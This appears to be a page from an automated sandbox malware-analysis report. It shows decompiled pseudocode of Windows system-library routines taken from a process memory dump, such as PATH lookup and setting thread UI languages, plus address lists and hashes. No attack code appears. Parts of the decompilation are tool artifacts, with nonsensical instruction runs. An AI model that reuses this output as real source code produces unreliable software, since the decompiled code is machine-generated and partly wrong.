					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L015F4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t323 + 0x3c)) = _t275;
							_t277 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x16c8478;
								 *_t323 = ((0 | _t305 == 0x016c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0161F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E016639F2(_t318);
									_t305 = _v32;
									_t318 = _t269;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t323 + _t277 * 4;
								_v56 = _t279;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t235 =  *(_v60 + _t289 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t289 * 4);
										 *(_t279 + 0x18) = _t318;
										_t239 =  *(_v60 + _t289 * 4);
										__eflags = _t239 - 8;
										if(_t239 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M01602959))) {
												case 0:
													__ax =  *0x16c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0161F3E0(__edi,  *0x16c848c, __ax & 0x0000ffff);
														__eax =  *0x16c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0161F3E0(_t318, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x16c8480 & 0x0000ffff = E0161F3E0(__edi,  *0x16c8484,  *0x16c8480 & 0x0000ffff);
													__eax =  *0x16c8480 & 0x0000ffff;
													__eax = ( *0x16c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0161F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0161F3E0(_t318, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t318 = _t318 + (_t264 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t318 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x16c575c;
													__eflags = __ebx - 0x16c575c;
													if(__ebx != 0x16c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0161F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x16c575c;
														} while (__ebx != 0x16c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x16c8478 & 0x0000ffff = E0161F3E0(__edi,  *0x16c847c,  *0x16c8478 & 0x0000ffff);
													__eax =  *0x16c8478 & 0x0000ffff;
													__eax = ( *0x16c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x16c6e58 & 0x0000ffff = E0161F3E0(__edi,  *0x16c6e5c,  *0x16c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x16c6e58 & 0x0000ffff;
													__eax = ( *0x16c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t239 =  *(_v60 + _t316 * 4);
						if(_t239 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t239 * 4 +  &M01602935))) {
							case 0:
								__ax =  *0x16c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E01602E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x16c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E015EEEF0(0x16c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E015EEB70(__ecx, 0x16c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x16c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E015EEB70(__ecx, 0x16c79a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t330;
										_pop(_t276);
										return E0161B640(_t214, _t276, _v8 ^ _t330, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t273 = E01602E3E(_t271,  &_v36);
									_t285 = _v36;
									_v76 = _t273;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x16c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x16c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x16c6e58 & 0x0000ffff;
								__eax = ( *0x16c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("pushad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t334;
					asm("pushad");
					_t240 = _t239 + _t334;
					asm("daa");
					asm("pushad");
					 *_t323 =  *_t323 + _t330;
					asm("pushad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t240;
					asm("pushad");
					 *0x1f016026 =  *0x1f016026 + _t240;
					_pop(_t280);
					 *[fs:eax+ebp+0x5b350160] =  *[fs:eax+ebp+0x5b350160] + _t305;
					 *[fs:edx] =  *[fs:edx] + _t240;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t334;
					 *_t240 =  *_t240 - 0x60;
					_t326 = _t323 + _t323;
					asm("daa");
					asm("pushad");
					 *_t326 =  *_t326 + _t280;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t240;
					_t327 = _t326 - 1;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t240;
					asm("daa");
					asm("pushad");
					_pop(_t281);
					 *[fs:eax+ebp+0x5c340160] =  *[fs:eax+ebp+0x5c340160] + _t326 - 1;
					_t336 = _t334 + _t290;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x16aff00);
					E0162D08C(_t281, _t318, _t327);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t295 = _t246 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x15b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E0161E5C0(_a8,  *((intOrPtr*)(_t295 + 0x15b1668)), _t282);
									_t336 = _t336 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t328 = E016551BE(_t282,  *((intOrPtr*)(_v48 + 0x15b166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t328 = 0xc0000100;
										goto L76;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L106:
												_t328 = E01602AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L69;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t251 = E015E6600( *(_t307 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t328 = E01602C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L76:
											_v32 = _t328;
											goto L69;
										}
									}
									goto L108;
								} else {
									E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t258 = E01602AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E01602C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
									}
									_v8 = _t319;
									E01602ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t328;
					}
					L70:
					return E0162D0D1(_t244);
				}
				L108:
			}

0x01602584
0x01602586
0x01602590
0x01602596
0x01602597
0x01602598
0x01602599
0x0160259e
0x016025a4
0x016025a9
0x016025ac
0x016025ae
0x016025b1
0x016025b2
0x016025b5
0x016025b8
0x016025bb
0x016025bc
0x016025bf
0x016025c2
0x016025c5
0x016025c6
0x016025cb
0x016025ce
0x016025d8
0x016025dd
0x016025de
0x016025e1
0x016025e3
0x016025e9
0x016026da
0x016026da
0x016026dd
0x016026e2
0x01645b56
0x00000000
0x016026e8
0x016026f9
0x016026fb
0x016026fe
0x01602700
0x01645b60
0x00000000
0x01602706
0x01602706
0x0160270a
0x0160270a
0x0160270d
0x01602713
0x01602716
0x01602718
0x0160271c
0x0160271e
0x01645b6c
0x01645b6f
0x01645b7f
0x01645b89
0x01645b8e
0x01645b93
0x01645b96
0x01645b9c
0x01645ba0
0x01645ba3
0x01645bab
0x01645bb0
0x01645bb3
0x01645bb3
0x01645ba3
0x01602724
0x01602726
0x01602729
0x0160272c
0x0160279d
0x0160279d
0x016027a0
0x016027a2
0x00000000
0x0160272e
0x0160272e
0x01602731
0x01602734
0x01602734
0x01602736
0x01645bc1
0x01645bc1
0x01645bc4
0x00000000
0x01645bca
0x01645bca
0x01645bcd
0x00000000
0x01645bd3
0x00000000
0x01645bd3
0x01645bcd
0x0160273c
0x0160273c
0x01602742
0x01602747
0x0160274a
0x0160274d
0x01602750
0x00000000
0x01602756
0x01602756
0x00000000
0x01602902
0x01602908
0x0160290b
0x00000000
0x01602911
0x0160291c
0x01602921
0x00000000
0x01602921
0x00000000
0x00000000
0x01602880
0x01602887
0x0160288c
0x00000000
0x00000000
0x01602805
0x0160280a
0x01602814
0x01602816
0x00000000
0x00000000
0x0160281e
0x01602821
0x01602823
0x00000000
0x01602829
0x01602829
0x01602831
0x0160283c
0x0160283e
0x00000000
0x0160283e
0x00000000
0x00000000
0x0160284e
0x01602850
0x01602851
0x01602854
0x01602857
0x0160285a
0x0160285c
0x0160285d
0x00000000
0x00000000
0x0160275d
0x01602761
0x00000000
0x01602767
0x0160276e
0x01602773
0x01602773
0x01602776
0x01602778
0x0160277e
0x0160277e
0x01602781
0x01602781
0x01602783
0x01602784
0x00000000
0x00000000
0x01645bd8
0x01645bde
0x01645be4
0x01645be6
0x01645be8
0x01645be9
0x01645bee
0x01645bf8
0x01645bff
0x01645c01
0x01645c04
0x01645c07
0x01645c0b
0x01645c0d
0x01645c0d
0x01645c15
0x01645c18
0x01645c1b
0x01645c1b
0x01645c1e
0x00000000
0x00000000
0x016028c3
0x016028c8
0x016028d2
0x016028d4
0x016028d8
0x016028db
0x01645c26
0x01645c28
0x01645c2d
0x01645c2d
0x00000000
0x00000000
0x01645c34
0x01645c36
0x01645c49
0x01645c4e
0x01645c54
0x01645c5b
0x01645c5d
0x01645c60
0x01602788
0x01602788
0x0160278b
0x0160278e
0x0160278e
0x0160278e
0x01602791
0x00000000
0x00000000
0x01602756
0x01602750
0x00000000
0x01602794
0x01602794
0x01602795
0x01602798
0x01602798
0x00000000
0x01602734
0x0160272c
0x01602700
0x016025ef
0x016025ef
0x016025ef
0x016025f2
0x016025f8
0x00000000
0x00000000
0x016025fe
0x00000000
0x016028e6
0x016028ec
0x016028ef
0x016028f5
0x016028f8
0x016028f8
0x00000000
0x016028f8
0x00000000
0x00000000
0x01602866
0x01602866
0x01602876
0x01602879
0x00000000
0x00000000
0x016027e0
0x016027e7
0x016027e9
0x016027eb
0x01645afd
0x00000000
0x01645afd
0x00000000
0x00000000
0x01602633
0x01602638
0x0160263b
0x0160263c
0x0160263e
0x01602640
0x01602642
0x01602647
0x01602649
0x0160264e
0x01602650
0x01602653
0x01602659
0x016026a2
0x016026a7
0x016026ac
0x016026b2
0x01645b11
0x01645b15
0x01645b17
0x00000000
0x016026b8
0x016026b8
0x016026ba
0x016027a6
0x016027a6
0x016027a9
0x016027ab
0x016027b9
0x016027b9
0x016027be
0x016027c1
0x016027c3
0x016027c5
0x016027c7
0x01645c74
0x01645c79
0x01645c79
0x016027c7
0x00000000
0x016026c0
0x016026c0
0x016026c3
0x016026c6
0x016026c6
0x016026c9
0x016026c9
0x00000000
0x016026c9
0x016026ba
0x0160265b
0x0160265b
0x0160265e
0x01602667
0x0160266d
0x01602677
0x0160267c
0x0160267f
0x01602681
0x01645b49
0x01645b4e
0x016027cd
0x016027d0
0x016027d1
0x016027d2
0x016027d4
0x016027dd
0x01602687
0x01602687
0x0160268a
0x0160268b
0x0160268e
0x0160268f
0x01602691
0x01602696
0x01602698
0x0160269d
0x0160269f
0x00000000
0x0160269f
0x01602681
0x00000000
0x00000000
0x01602846
0x00000000
0x00000000
0x01602605
0x0160260a
0x0160260c
0x01602611
0x01602616
0x01602619
0x01602619
0x0160261e
0x00000000
0x01602624
0x01602627
0x01602627
0x00000000
0x00000000
0x01645b1f
0x00000000
0x00000000
0x01602894
0x0160289b
0x0160289d
0x016028a1
0x01645b2b
0x01645b2e
0x01645b2e
0x016028a7
0x016028a9
0x01645b04
0x01645b09
0x01645b09
0x01645b09
0x00000000
0x00000000
0x01645b35
0x01645b3c
0x016028fb
0x016028fb
0x016026cc
0x016026cc
0x016026d0
0x00000000
0x016026d2
0x016026d2
0x00000000
0x016026d2
0x00000000
0x00000000
0x016025fe
0x0160292d
0x0160292f
0x01602930
0x01602935
0x01602937
0x01602938
0x0160293b
0x0160293c
0x0160293e
0x0160293f
0x01602940
0x01602942
0x01602944
0x01602947
0x01602948
0x0160294e
0x0160294f
0x01602957
0x0160295a
0x0160295d
0x01602960
0x01602962
0x01602963
0x01602964
0x01602966
0x01602969
0x0160296a
0x0160296e
0x0160296f
0x01602972
0x01602973
0x0160297b
0x0160297e
0x0160297f
0x01602980
0x01602981
0x01602982
0x01602983
0x01602984
0x01602985
0x01602986
0x01602987
0x01602988
0x01602989
0x0160298a
0x0160298b
0x0160298c
0x0160298d
0x0160298e
0x0160298f
0x01602990
0x01602992
0x01602997
0x016029a3
0x016029a6
0x016029ab
0x016029ad
0x016029b0
0x016029b2
0x01645c80
0x016029b8
0x016029b8
0x016029bb
0x016029c0
0x016029c5
0x016029c6
0x016029c6
0x016029c9
0x016029cb
0x00000000
0x00000000
0x016029cd
0x016029d0
0x016029d9
0x016029db
0x016029dd
0x01602a7f
0x01602a84
0x01602a87
0x01602a89
0x01645ca1
0x01645ca3
0x00000000
0x01602a8f
0x01602a8f
0x00000000
0x01602a8f
0x00000000
0x016029e3
0x016029e3
0x016029e3
0x00000000
0x016029e3
0x016029dd
0x00000000
0x016029db
0x016029e6
0x016029e9
0x016029eb
0x016029ed
0x016029f3
0x016029f5
0x016029f8
0x016029fa
0x01602a97
0x01602a9a
0x01602a9d
0x01602add
0x00000000
0x01602a9f
0x01602aa2
0x01602aa5
0x01602aa8
0x01602aab
0x01645cab
0x01645caf
0x01645cc5
0x01645cda
0x01645cdc
0x01645cdf
0x01645ce5
0x00000000
0x01645ceb
0x01645ced
0x01645cee
0x00000000
0x01645cee
0x01645cb1
0x01645cb4
0x01645cb9
0x01645cbb
0x00000000
0x01645cbd
0x01645cbd
0x00000000
0x01645cbd
0x01645cbb
0x01602ab1
0x01602ab1
0x01602ac4
0x01602ac6
0x01602ac6
0x00000000
0x01602ac6
0x01602aab
0x00000000
0x01602a00
0x01602a09
0x01602a0e
0x01602a21
0x01602a24
0x01602a35
0x01602a3a
0x01602a3d
0x01602a42
0x01602a59
0x01602a59
0x01602a5c
0x01602a5f
0x01602a5f
0x016029fa
0x016029f3
0x01602a64
0x01602a64
0x01602a6b
0x01602a6b
0x01602a6d
0x01602a72
0x01602a72
0x00000000

Strings

PATH, xrefs: 01602642, 01602691

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 19e47abaa6154cbd833c9d16849f1c702a5bebce4809a1e567e119b817750fee
Instruction ID: 74383dd8d79b076e4d657f0884c99c54605627fae5659d3e41de8eedc94410b7
Opcode Fuzzy Hash: 19e47abaa6154cbd833c9d16849f1c702a5bebce4809a1e567e119b817750fee
Instruction Fuzzy Hash: C5C19F71D102199FDB2ADF99DC94ABEBBB5FF48700F18402DE505AB390D734A942CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0160FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0160FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E015EEEF0(0x16c7b60);
					_t134 =  *0x16c7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x16c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x16c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E015E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E015E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01678938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E015DB150();
													}
													_t116 = E01676D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E015E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x16c8638; // 0x0
																	_t122 = L015E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E015E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E015E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0160FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L015E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0160FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0160FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0160FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0160FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
